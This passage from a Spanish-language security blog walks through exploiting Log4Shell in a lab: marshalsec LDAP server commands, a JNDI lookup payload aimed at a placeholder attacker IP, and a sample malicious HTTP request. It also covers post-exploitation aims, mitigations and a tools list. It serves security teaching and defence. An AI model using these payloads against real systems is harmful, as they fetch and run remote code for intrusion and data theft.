  • Herramientas como netcat (nc) y un servidor LDAP/RMI para la escucha.

La clave para cualquier operación exitosa es la preparación. Un atacante que no prepara su terreno es un atacante destinado a ser descubierto antes de que la primera línea de código malicioso vea la luz.

El Mecanismo de Ataque: JNDI Injection

El corazón de Log4Shell late al ritmo de JNDI. JNDI es una API de Java que permite a las aplicaciones buscar y acceder a recursos (como servicios de nombres y directorios, bases de datos, etc.) de forma uniforme, independientemente del protocolo subyacente. Las aplicaciones pueden usar JNDI para buscar objetos a través de protocolos como LDAP (Lightweight Directory Access Protocol) o RMI (Remote Method Invocation).

"La curiosidad mató al gato... pero la imprudencia en la búsqueda de información mató al servidor."

Log4j, en sus versiones vulnerables, permitía la interpolación de variables de entorno y mensajes personalizados directamente en las líneas de log. Si un atacante enviaba una cadena como ${jndi:ldap://servidor-malicioso.com/objeto-malicioso}, Log4j intentaría resolver esta JNDI Lookup. Si el servidor servidor-malicioso.com respondía con un objeto Java que, al ser deserializado o cargado, ejecutaba código arbitrario, el atacante habría logrado su objetivo.

Este es un ejemplo clásico de "input sanitization failure". El programa confía ciegamente en la entrada del usuario, interpretándola como instrucciones válidas en lugar de datos crudos. Una falla de diseño fundamental.

Paso a Paso: Explotando Log4Shell

Vamos a simular un ataque básico utilizando un entorno controlado. El objetivo es lograr la ejecución de un comando simple en el servidor vulnerable.

Configuración del Servidor Vulnerable (Docker)

Primero, necesitamos una aplicación Java vulnerable a Log4Shell. Podemos usar una imagen de Docker que contenga una versión vulnerable de Log4j. Una forma sencilla es usar una aplicación web de ejemplo que incluya la librería. Aquí un ejemplo de cómo podrías montar un contenedor (para fines demostrativos, asume que tienes una aplicación vulnerable corriendo en el puerto 8080):


# Ejemplo hipotético de cómo se ejecutaría una app vulnerable en Docker
# docker run -p 8080:8080 vulnerable/log4shell-app
# (Nota: Necesitarías una imagen específica o compilar una app de ejemplo)

Una vez que la aplicación está en marcha, intentará registrar cualquier entrada que reciba. Si esa entrada contiene el patrón JNDI, ¡estamos en problemas!

Configuración del Servidor de Ataque (LDAP/RMI)

Necesitaremos un servidor que responda a la petición JNDI del objetivo y le envíe un payload malicioso. Aquí es donde entran herramientas como marshalsec o un servidor LDAP/RMI personalizado.

Usando marshalsec (una herramienta popular para explotar deserialización y JNDI):


# Descarga y compila marshalsec si no lo tienes
# git clone https://github.com/mbechler/marshalsec.git
# cd marshalsec
# mvn clean package -DskipTests

# Levanta un servidor LDAP que responda con una clase Java maliciosa
# El 'localhost:8000/Exploit' se refiere a donde serviremos la clase maliciosa
# El 'Exploit' es la clase o el comando que quieres ejecutar en el objetivo
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://TU_IP_ATACANTE:8000/#Exploit"

En paralelo, necesitarás un servidor HTTP simple para servir la clase Java que contendrá el código a ejecutar en el objetivo. Por ejemplo, si tu clase se llama Exploit.java y compila a Exploit.class:


# Sirve la clase .class compilada desde un directorio local
python3 -m http.server 8000

Asegúrate de reemplazar TU_IP_ATACANTE con la IP de tu máquina atacante que está sirviendo el payload HTTP y el servidor LDAP.

El Payload: La Llave Maestra

La magia (o más bien, la maldición) reside en el payload que enviamos. El formato más común involucra una JNDI Lookup a un servidor LDAP o RMI controlado por el atacante. El servidor malicioso, al recibir la petición, enviará de vuelta las instrucciones para cargar y ejecutar código Java remoto.

Un payload típico se ve así:

${jndi:ldap://TU_IP_ATACANTE:1389/a}

Donde:

  • ${...}: Indica una interpolación o lookup en Log4j.
  • jndi:: Especifica el protocolo JNDI.
  • ldap://: El protocolo de nomenclatura y directorio.
  • TU_IP_ATACANTE:1389: La dirección y puerto de nuestro servidor LDAP malicioso.
  • /a: Un punto de entrada genérico en el servidor LDAP, que referenciará a nuestro objeto malicioso.

Si la aplicación susceptible es una página web, podrías enviar este payload en un campo de búsqueda, encabezado HTTP (como `User-Agent` o `X-Forwarded-For`), o cualquier otro lugar donde la aplicación registre la entrada del usuario.

Ejemplo de petición HTTP maliciosa:

GET /search?query=${jndi:ldap://TU_IP_ATACANTE:1389/a} HTTP/1.1
Host: vulnerable-site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

Al recibir esta petición, Log4j intentará resolver la URL LDAP. Nuestro servidor LDAP de `marshalsec` interceptará esto y le dirá al cliente que cargue una clase desde nuestra dirección HTTP.

La clave aquí es la *confianza implícita* en el protocolo de búsqueda. El sistema confía en que la fuente de la información JNDI es legítima, un error de diseño que se paga caro.

Post-Explotación: Más Allá del Acceso

Una vez que el payload se ejecuta y obtenemos una "shell" (o más comúnmente, la capacidad de ejecutar comandos remotos), el trabajo del atacante apenas comienza. El objetivo ahora es mantener el acceso, moverse lateralmente y exfiltrar datos valiosos.

"El primer acceso es solo la puerta. La persistencia es el arte de no ser expulsado."

Las acciones típicas incluyen:

  • Escalada de Privilegios: Buscar formas de obtener privilegios de administrador en el sistema comprometido.
  • Movimiento Lateral: Utilizar el servidor comprometido como punto de partida para atacar otros sistemas dentro de la misma red.
  • Persistencia: Instalar mecanismos (backdoors, tareas programadas) para asegurar el acceso incluso si el sistema se reinicia o la vulnerabilidad original es parcheada.
  • Exfiltración de Datos: Copiar información sensible (credenciales, datos de clientes, propiedad intelectual) fuera de la red comprometida.

Log4Shell, al permitir RCE, otorga al atacante una carta blanca para realizar cualquiera de estas acciones. La velocidad y la sigilo son cruciales en esta fase.

Mitigación y Defensa: Cerrando la Brecha

La buena noticia es que existen formas de tapar esta brecha. Las estrategias clave son:

  1. Actualización Inmediata: Actualiza Log4j a una versión no vulnerable (2.17.1 o posterior es altamente recomendado para cubrir múltiples CVEs relacionados). Este es el paso más crítico y efectivo. Si no puedes actualizar inmediatamente, considera las siguientes medidas temporales.
  2. Parches de Configuración (Temporales):
    • Desactivar Búsquedas JNDI: Si usas Log4j 2.10 a 2.16, puedes establecer un sistema de propiedad como log4j2.formatMsgNoLookups=true.
    • Eliminar la Clase JndiLookup: Para versiones 2.x anteriores a 2.16, puedes eliminar la clase JndiLookup del classpath de Log4j: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
  3. Web Application Firewalls (WAFs): Implementa o actualiza las reglas de tu WAF para detectar y bloquear payloads de Log4Shell conocidos. Sin embargo, los atacantes astutos siempre encuentran formas de evadir las firmas.
  4. Segmentación de Red: Limita la capacidad de movimiento lateral de un atacante. Si un servidor se ve comprometido, la red debe estar diseñada para contener el daño.
  5. Monitoreo y Detección de Intrusiones (IDS/IPS): Configura sistemas para detectar patrones de tráfico sospechoso o la ejecución de comandos anómalos.

No confíes solo en una capa de defensa. La seguridad moderna requiere profundidad y múltiples controles.

Veredicto del Ingeniero: La Lección de Log4Shell

Log4Shell no fue solo una vulnerabilidad; fue un grito de alarma. Demostró la fragilidad de las cadenas de suministro de software y la necesidad crítica de una visibilidad profunda de los componentes utilizados. La lección es clara: no puedes proteger lo que no conoces.

Pros de la librería Log4j:

  • Flexibilidad y potencia en el logging.
  • Amplia adopción en el ecosistema Java.
  • Funcionalidades avanzadas para la gestión de logs empresariales.

Contras y Riesgos:

  • Complejidad que puede llevar a fallos de seguridad graves (como Log4Shell).
  • Dependencia de Java, un ecosistema con su propio conjunto de vectores de ataque (deserialización, etc.).
  • La dificultad de auditar y parchar todas las instancias en entornos complejos.

¿Vale la pena adoptar Log4j? Sí, es una herramienta potente. Sin embargo, su adopción debe ir acompañada de una estrategia de gestión de vulnerabilidades agresiva, auditorías de seguridad continuas y la rápida aplicación de parches. El conocimiento superficial de una librería no es suficiente; debes entender sus implicaciones de seguridad y los riesgos asociados a cada una de sus características.

Arsenal del Operador/Analista

Para enfrentarse a amenazas como Log4Shell, un profesional de la seguridad necesita las herramientas adecuadas:

  • Herramientas de Pentesting y Escaneo:
    • Nmap: Para escaneo de puertos y descubrimiento de servicios.
    • Burp Suite / OWASP ZAP: Para interceptar y manipular tráfico web, crucial para enviar payloads.
    • Metasploit Framework: Contiene módulos para explotar Log4Shell y realizar post-explotación.
    • Nuclei / Trivy: Escáneres de vulnerabilidades que pueden detectar la presencia de Log4j vulnerable.
  • Herramientas de Análisis y Escucha:
    • Netcat (nc): El navaja suiza para redes, indispensable para escuchar conexiones entrantes.
    • Wireshark: Para el análisis profundo de tráfico de red.
    • Servidores LDAP/RMI/HTTP personalizados: Como `marshalsec` para servir payloads.
  • Libros Clave:
    • "The Web Application Hacker's Handbook" de Dafydd Stuttard y Marcus Pinto.
    • "Black Hat Python" de Justin Seitz.
    • "Hands-On Network Programming with Python" de Beedie y Sen.
  • Certificaciones Relevantes:
    • OSCP (Offensive Security Certified Professional): Demuestra habilidades prácticas de pentesting.
    • GIAC Certified Penetration Tester (GPEN): Certificación reconocida en la industria.
    • Certificaciones Cloud Security (AWS, Azure, GCP): Dado que muchas aplicaciones se ejecutan en la nube.

No subestimes el poder de un buen libro y una certificación que valide tus habilidades. Son el combustible para mantener tu motor de ataque y defensa en marcha.

Preguntas Frecuentes (FAQ)

¿Qué versión de Log4j es vulnerable a Log4Shell?

Generalmente, las versiones 2.0-beta9 hasta la 2.14.1 son vulnerables. Sin embargo, se han descubierto CVEs adicionales en versiones posteriores (como 2.15, 2.16, 2.17) que requerían parches más completos. Se recomienda actualizar a la última versión estable (e.g., 2.21.1 o superior).

¿Es posible mitigar Log4Shell sin actualizar Log4j?

Sí, como se mencionó, se pueden aplicar configuraciones como `log4j2.formatMsgNoLookups=true` o eliminar la clase `JndiLookup.class`. No obstante, estas son soluciones temporales o parciales comparadas con una actualización completa y son menos seguras.

¿Afecta Log4Shell solo a aplicaciones web?

No. Cualquier aplicación Java que utilice una versión vulnerable de Log4j y registre datos controlados por el usuario está en riesgo. Esto incluye servicios backend, aplicaciones de escritorio, sistemas de mensajería, etc.

¿Qué es JNDI y por qué es peligroso en este contexto?

JNDI (Java Naming and Directory Interface) es una API de Java para acceder a servicios de nombres y directorios. Es peligroso en Log4Shell porque permite a la librería de logging, sin una validación adecuada, conectarse a servidores remotos (como LDAP o RMI) y descargar/ejecutar código arbitrario enviado por un atacante.

El Contrato: Domina el JNDI Injection

Tu misión, si decides aceptarla: levanta un contenedor Docker con una aplicación web vulnerable a Log4Shell (puedes buscar "docker log4shell vulnerable app" en la web). Luego, configura tu propio servidor LDAP/RMI (puedes usar `marshalsec` o herramientas similares) y un servidor HTTP para servir un payload que ejecute un comando `whoami` o `id` en el servidor vulnerable. Documenta el proceso, los payloads utilizados y la respuesta obtenida. Demuestra tu dominio sobre la explotación de JNDI.

Ahora es tu turno. ¿Estás listo para auditar tus propios sistemas? ¿O prefieres esperar a que un espectro como Log4Shell golpee tu puerta? El conocimiento es poder, pero la acción es seguridad. Comparte tus hallazgos, payloads y cualquier duda en los comentarios. El campo de batalla digital espera a los preparados.

at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)